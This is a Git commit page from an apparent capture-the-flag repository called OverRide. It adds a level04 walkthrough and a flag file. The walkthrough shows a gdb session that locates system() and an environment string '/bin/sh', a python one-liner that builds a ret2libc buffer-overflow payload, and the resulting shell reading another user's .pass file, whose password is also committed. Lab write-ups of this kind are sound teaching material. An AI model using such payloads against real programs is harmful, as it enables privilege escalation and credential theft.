gbrochar
/
OverRide
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

feat: level04 + level05 elf

This commit is contained in:
gbrochar 2025-05-12 16:44:04 +02:00
parent dfb81e7718
commit 74a1506332
3 changed files with 73 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

72
level04/Ressources/walkthrough.md Normal file
View File

@ -0,0 +1,72 @@
level04@OverRide:~$ export EGG=" /bin/sh"
level04@OverRide:~$ gdb level04
bGNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>...
Reading symbols from /home/users/level04/level04...(no debugging symbols found)...done.
(gdb) b main+150
Function "main+150" not defined.
Make breakpoint pending on future shared library load? (y or [n]) ^Cn
(gdb) Quit
(gdb) b *main+150
Breakpoint 1 at 0x804875e
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/users/level04/level04
[New process 1813]
Give me some shellcode, k
[Switching to process 1813]
Breakpoint 1, 0x0804875e in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e6aed0 <system>
(gdb) p (char *)getenv("EGG")
$2 = 0xffffd857 ' ' <repeats 200 times>...
(gdb) exit
Undefined command: "exit". Try "help".
(gdb) quit
A debugging session is active.
Inferior 2 [process 1813] will be killed.
Quit anyway? (y or n) y
child is exiting...
level04@OverRide:~$ env
TERM=xterm-256color
SHELL=/bin/bash
SSH_CLIENT=10.0.2.2 59932 4242
OLDPWD=/home/users/level04
SSH_TTY=/dev/pts/0
EGG= /bin/sh
USER=level04
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
MAIL=/var/mail/level04
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
PWD=/home/users/level04
LANG=en_US.UTF-8
SHLVL=1
HOME=/home/users/level04
LANGUAGE=en_US:en
LOGNAME=level04
SSH_CONNECTION=10.0.2.2 59932 10.0.2.15 4242
LESSOPEN=| /usr/bin/lesspipe %s
LESSCLOSE=/usr/bin/lesspipe %s %s
_=/usr/bin/env
level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > exploit.txt
-bash: exploit.txt: Permission denied
level04@OverRide:~$ chmod +w .
level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > exploit.txt
level04@OverRide:~$ cat exploit.txt - | ./level04
Give me some shellcode, k
whoami
level05
cat /home/users/level05/.pass
3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN

1
level04/flag Normal file
View File

@ -0,0 +1 @@
3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN

BIN
level05/Ressources/level05 Executable file
View File

Binary file not shown.